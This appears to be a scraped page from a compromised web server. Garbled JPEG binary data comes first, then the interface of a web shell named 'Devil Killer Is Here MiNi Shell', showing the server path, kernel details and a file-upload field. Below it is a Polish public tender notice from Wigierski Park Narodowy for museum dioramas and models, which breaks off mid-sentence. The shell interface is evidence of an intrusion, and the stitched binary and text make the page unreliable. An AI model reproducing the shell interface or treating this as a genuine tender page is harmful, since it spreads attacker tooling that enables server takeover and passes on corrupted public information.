JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240924/0051327201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie i montaż dioram i makiet w Muzeum Wigier w Starym Folwarku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WIGIERSKI PARK NARODOWY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 200664930</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krzywe 82</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Suwałki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-402</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wigry_pn@wigry.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wigry.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie i montaż dioram i makiet w Muzeum Wigier w Starym Folwarku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bd069b75-4d44-41c9-96d0-34cc96211997</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00513272</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00079022/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.2.1 modernizacja wystawy stałej w Muzeum Wigier</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Modernizacja ośrodka edukacyjnego Wigierskiego Parku Narodowego - Muzeum Wigier”, numer FEPW.02.03-IW.01-0004/24 współfinansowanego ze środków Unii Europejskiej z programu Fundusze Europejskie dla Polski Wschodniej </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bd069b75-4d44-41c9-96d0-34cc96211997 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1)	Komunikacja w postępowaniu, z wyłączeniem składania ofert , odbywa się drogą elektroniczną za pośrednictwem portalu eZamówienia -poprzez stronę internetową postępowania https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bd069b75-4d44-41c9-96d0-34cc96211997 zakładka „Formularze&#34; lub poczty elektronicznej marekw2@vp.pl <br/>2)	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3)	Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Marek Wrona, e-mail: marekw2@vp.pl <br/>4)	Postępowanie prowadzone jest na Platformie eZamówienia, identyfikator ocds-148610-bd069b75-4d44-41c9-96d0-34cc96211997<br/>	Zamawiający zgodnie z art. 61 ust.1 PZP informuje, że w toku postępowania o udzielenie zamówienia komunikacja w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.	Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej:<br/>1)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca&#34; na Platformie e-Zamówienia. <br/>2)	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z 30.12.2020 r. w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia R.M. w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy PZP, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>3)	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa R.M. w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a.	w formatach danych określonych w przepisach rozporządzenia R.M. w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>b.	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji&#34;).<br/>4)	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16.04.1993 r. o zwalczaniu nieuczciwej konkurencji Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Tajemnica przedsiębiorstwa&#34;.<br/>5)	W przypadku załączników, które są zgodnie z ustawą PZP lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/ Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>6)	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji&#34; w pełnym zakresie wymaga posiadania konta „Wykonawcy&#34; na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji&#34; służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>7)	Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja&#34;.<br/>8)	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji&#34; wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>9)	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem&#34;.<br/>10)	Zamawiający nie przewiduje zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69, wobec czego nie dopuszcza komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Opisano w SWZ Rozdział 17</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Opisano w SWZ Rozdział 17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dioramy i makiety mają obrazować fragment danego środowiska/ ekosystemu; mają pokazywać wybrane organizmy roślinne i zwierzęce, które żyją w systemie wzajemnych uwarunkowań i współzależności. Wystawy mają być w pełni realistyczne.<br/>1)	DIORAMY:<br/>a.	LODOWIEC: renowacja dioramy lodowca, w tym: <br/>a)	wymiana tzw. zadymki śnieżnej tj. zastąpienie płyt z poliwęglanu płytami ze szkła bezpiecznego grubości 12 mm z folią antywłamaniową, wymiary komory szklanej to 2,5 x 2,5 x 0,7m; <br/>b)	umieszczenie w komorze szklanej drobin pierza ptasiego przypominającego płatki spadającego śniegu; <br/>c)	montaż wentylatora, do poruszania drobin pierza, uruchomianego czujnikiem ruchu; <br/>d)	przebudowa istniejącej części jaskini lodowej -polepszenie dostępu do monitora wyświetlającego prezentację; <br/>e)	odnowienie wszystkich ścian makiety istniejącego lodowca (około 100m2) wraz ze zmianą sprzętu do tłoczenia wody (zakup nowego) i efektem wodospadu (cieknącej wody po ścianie) – rozmiar ściany, po której powierzchni ścieka woda to 1 x 3 m (szerokość x wysokość), oraz uzupełnienie ubytków w ścianach lodowca i odmalowanie całości. <br/>b.	ŁOWCY – powierzchnia do zagospodarowania to około 3,5 x 2 m, w tym: <br/>a)	nawierzchnia przypominająca piasek trwale przymocowany żywicą do podłoża; <br/>b)	makieta namiotu z naturalnych skór reniferów i gałęzi - wysokość 2,5-2,9 m, średnica podstawy nie powinna przekraczać 1,5 m; <br/>c)	model przedstawiający postać kobiety siedzącej lub klęczącej przy ognisku („łowczyni reniferów” w skala 1:1) z piekącą się rybą na patyku;<br/>d)	ognisko kamienne ze sztucznym ogniem (interaktywne, rozpalanie ognia za pomocą pocierania patyka, co uruchomi diody, których światło ma przypominać tlący się płomień). <br/>Tłem dla dioramy mają być zdjęcia w 3D nie będące przedmiotem zamówienia. Diorama ma tworzyć ze zdjęciami jednolitą kompozycję.<br/>c.	RYBY – powierzchnia do zagospodarowania to około 1,8 x 6,0 m, w tym: <br/>a)	Demontaż istniejących eksponatów (ryby, muszle, łódź), wyczyszczenie ich i ponowny montaż; <br/>b)	nawierzchnia przypominająca piaszczyste dno jeziora trwale przymocowana żywicą do podłoża; <br/>c)	nowe modele zwierząt i roślin o wymiarach rzeczywistych sieja, karaś pospolity, rak błotny, rak szlachetny, rak pręgowaty, śliz, koza, piskorz, różanka, piekielnica oraz przytwierdzone do podłoża: rogatek sztywny, rdestnica lśniąca x 4szt, osoka aloesowata x 4szt, gąbka słodkowodna - nadecznik.<br/>Tłem dla dioramy mają być plansze nie będące przedmiotem zamówienia. Diorama ma tworzyć z planszami jednolitą kompozycję.<br/>d.	BÓBR – powierzchnia do zagospodarowania to około 3,5 x 1,3 m, składająca się z: <br/>a)	podstawy żeremia – podwyższenie ze ścianką ok. 70 cm z grubej pleksy, przez którą widoczne są podziemne nory bobrów w przekroju; <br/>b)	modelu bobra;<br/>c)	modelu fragmentu żeremia z gałęzi na podstawie, wychodzącego z rogu pomieszczenia, łączącego się ze zdjęciami 3D; <br/>d)	fotoramki (w posiadaniu muzeum) z filmem o życiu bobrów zamontowanej w ścianie żeremia (film nie stanowi przedmiotu zamówienia); <br/>e)	otoczenia żeremia w postaci zgryzów, gałęzi, 3 drzew z zielonymi liśćmi – olcha x 1szt i brzoza x 2szt (o wysokości ok. 2 m) i innej zielonej roślinności przybrzeżnej będącej naturalnymi eksponatami lub modelami.<br/>Tłem dla dioramy mają być zdjęcia w 3D nie będące przedmiotem zamówienia. Diorama ma tworzyć ze zdjęciami jednolitą kompozycję.<br/>e.	PTAKI – powierzchnia do zagospodarowania to około 2,7 x 8,0, składająca się z: <br/>a)	stabilnego podłoża (żywicowanego) odzwierciedlającego brzeg jeziora;<br/>b)	naturalnych modeli przedstawiających roślinność przybrzeżną: 7 drzew o wysokości ok. 2,5m z zielonymi liśćmi (olcha, wierzba) i trzciny zielonej (ilość: pokrycie powierzchni o wymiarach 2 x 0,2 m); <br/>c)	modeli ptaków w skali 1:1 - bielik x 2 sztuki (lecący i siedzący), kania ruda, błotniak stawowy (3 młode na gnieździe i jajko), łabędź niemy, gęś białoczelna, żuraw, pliszka siwa, zimorodek, bocian czarny, łyska, kormoran, tracz nurogęś; <br/>d)	wymiany istniejącego systemu odtwarzającego głosy ptaków - na barierce istniejącego pomostu są przyciski uruchamiające odtwarzanie głosów tych ptaków. Przy włączeniu przycisku świeci się czerwona dioda przy modelu ptaka właściwego gatunku. System należy wyposażyć w pętlę indukcyjną celem udostępnienia tego elementu wystawy osobom posługującym się aparatami słuchowymi.<br/>Tłem dla dioramy mają być zdjęcia w 3D nie będące przedmiotem zamówienia. Diorama ma tworzyć ze zdjęciami jednolitą kompozycję.<br/>2)	MAKIETY:<br/>a.	OSADY DENNE - wykonanie modelu odwiertu osadów dennych zalegających w dnie jeziora Wigry, model osadów umieszczony w tubie z pleksy/szkła, o wysokości około 2-3 m i średnicy około 20 cm;<br/>b.	MARTWE DREWNO - wykonanie makiety interaktywnej w formie płaskorzeźby, przyczepionej do ściany o rozmiarach 2,6 x 2,6 m , pnia martwego drzewa, w którym znajduje się 5 „lup” w środkowej części makiety (grube szkło z klapkami, umożliwiające obejrzenie eksponatów organizmów znajdujących się na półce za szkłem) o średnicy około 10 cm oraz 4 szuflad o rozmiarze około 25 cm wysokości i 40 cm szerokości w dolnej części makiety. W szufladach umieszczone zostaną modele organizmów związanych z martwym drewnem znajdujące się w zasobach muzeum. W otoczeniu płaskorzeźby należy wykonać i zamontować modele pełno-plastyczne w skali 1:1: <br/>a)	lecącego nietoperza,<br/>b)	kreta z kretowiskiem, <br/>c)	traszki grzebieniastej,<br/>d)	ropuchy szarej.<br/>c.	UŻYTKOWANIE LASU - makieta składać się ma z: <br/>a)	barci wydrążonej w pniu drzewa (pień drzewa około 2,9 m wysokości i 0,6 m średnicy), wraz z deską zatworu, modeli plastrów miodu zamontowanych wewnątrz barci, modeli 30 pszczół w skali 1;1 zawieszonych wkoło barci, oraz zamontowaniu na barci ,,leziwa” (oryginalny sprzęt bartnika do wspinania się po drzewach);<br/>b)	obok barci montaż pnia drzewa ze spałą żywiczarską – wraz z kubeczkiem do zbioru żywicy;<br/>c)	tratwa ze ściętych pni przebudowana z istniejącej tratwy w muzeum.<br/>d.	W KLASZTORZE – makieta składa się ze studni „kamiennej” wraz z legendą o siei Wigierskiej. Studnia 80 cm wysokości i 80 cm średnica (powstaje tylko połowa – 40 cm studni wychodzącej ze ściany), zabezpieczona od góry grubym szkłem. Z prawej strony, w ścianie studni rączka, aby można było przewijać legendę umieszczoną wewnątrz studni – obracające się walce z nawiniętym na nie płótnem z wydrukiem legendy z rysunkami. <br/>e.	PIEC - makieta kamiennego pieca hutniczego do wytopu żelaza – interaktywny model pieca z wizualizacją ognia, interakcja polega na uruchamianiu podświetlenia diod wewnątrz pieca za pomocą miecha, makieta będzie umieszczona w narożniku ścian o wymiarach: 140 x 90 x 90 cm (wysokość x szerokości ścian bocznych). <br/>f.	GLINIANA ŚCIANA - makieta ściany starego domu - ściany z glinobitki o wymiarach: 1,55 x 2,9 m (szerokość x wysokość); do ściany zamocowane artefakty: fragment płotu, garnek gliniany na płocie, model bukietu rosnących kwitnących 3 kwiatów słonecznika o wysokości około 1m przy płocie.<br/>g.	TORFOWISKO – makieta pła torfowego umieszczona na podłodze - materac z gąbki pokryty sztuczną zieloną murawą – rozmiar około 2,6 x 2 m (szerokość x długość).<br/>Zamawiający wymaga aby wszelkie elementy interaktywne zostały wykonane w sposób umożliwiający dostęp do nich dla osób poruszających się na wózku inwalidzkim. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79931000-9 - Usługi dekoracji wnętrz</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zdolności do występowania w obrocie gospodarczym <br/>Zamawiający nie ustanowił wymagań w tym zakresie;<br/>2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. <br/>Zamawiający nie ustanowił wymagań w tym zakresie;<br/>3.	Sytuacji ekonomicznej lub finansowej. <br/>Zamawiający nie ustanowił wymagań w tym zakresie;<br/>4.	Zdolności technicznej lub zawodowej. <br/>W tym zakresie Zamawiający wymaga aby Wykonawca: posiadał wiedzę i doświadczenie niezbędne do wykonania zamówienia, tj. wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, co najmniej trzy dioramy o kubaturze co najmniej 10 m³, z czego przynajmniej jedna była dioramą przyrodniczą i zawierała co najmniej 10 modeli roślinnych i zwierzęcych w skali 1:1. Przynajmniej jedna z wykonanych wystaw była na kwotę minimum 100 000 zł. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania (art. 274 ust.1 PZP), aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających spełnianie warunków udziału w postępowaniu: Załącznik nr 5 – Wykaz zrealizowanych usług oraz poświadczeń wystawionych przez Zamawiających na rzecz których Wykonał usługi wskazane w Rozdziale 5 ust 4 niniejszej SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4)	Oświadczenie podmiotu udostępniającego zasoby stanowiące potwierdzenie spełniania warunków udziału w postępowaniu i braku przesłanek wykluczenia z postępowania, o których mowa w Rozdziale 6 niniejszej SWZ Załącznik nr 3 do SWZ <br/>5)	Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów Załącznik nr 4 do SWZ<br/>6)	W celu potwierdzenia, że osoba/osoby działające w imieniu Wykonawcy są umocowane do jego reprezentowania, Zamawiający żąda dołączenia do oferty Odpisu lub Informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Oferta nie musi zawierać tych dokumentów w przypadku wskazania przez Wykonawcę, że są one dostępne w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych. Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z ww. dokumentów. Dokumenty muszą być podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>7)	Jeżeli dotyczy - pełnomocnictwo do reprezentowania albo reprezentowania i zawarcia umowy Wykonawców składających ofertę wspólnie; podpisane kwalifikowanym podpisem elektronicznym, podpisem 